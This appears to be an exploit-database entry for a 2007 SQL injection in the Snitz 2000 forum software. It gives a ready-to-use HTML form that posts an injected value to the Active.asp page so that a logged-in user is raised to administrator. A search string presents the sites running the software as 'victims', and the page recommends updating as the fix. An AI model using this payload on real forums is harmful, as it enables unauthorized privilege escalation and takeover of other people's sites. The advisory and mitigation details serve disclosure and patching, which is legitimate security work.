header-logo
Suggest Exploit
vendor:
Snitz 2000
by:
Soroush Dalili
N/A
CVSS
N/A
SQL Injection
CWE
Product Name: Snitz 2000
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

A user can gain admin level in snitz 2000 by SQL Injection

A user can gain admin level in the forum and can access to the forum. It is because of a SQL Injection in 'Active.asp'. After login to your VICTIM forum, execute the provided HTML exploit.

Mitigation:

Update to the latest version of Snitz 2000
Source

Exploit-DB raw data:

########################## WwW.BugReport.IR #########################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Title: A user can gain admin level in snitz 2000 by SQL Injection
# vendor: http://forum.snitz.com/
# Googling: "Powered by Snitz" > 2,440,000 victims
# Last bug report in 2007-02-16 with 4692 visitors
# Exploit: Available
# Fix Available: Update to last version.
######################## Bug Description ###########################
A user can gain admin level in the forum and can access to the forum.
It is because of a SQL Injection in "Active.asp"

After login to your VICTIM forum, execute below script
~~~~~~~~~~~Start HTML Exploit~~~~~~~~~
<form action="http://[VICTIM URL]/active.asp" method="post">
Query: <input type="text" name="BuildTime" value="',M_Level='3" /><br />
DefaultValues: <input type="text" name="AllRead" value="Y" /><br />
Submit: <input type="submit" name="submit" value="Submit" /><br />
</form>
~~~~~~~~~~~End HTML Exploit~~~~~~~~~

#####################################################################
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
# Country: Iran
# Contact: admin@bugreport.ir
# Credit: Soroush Dalili found this bug.
#####################################################################

# milw0rm.com [2007-12-03]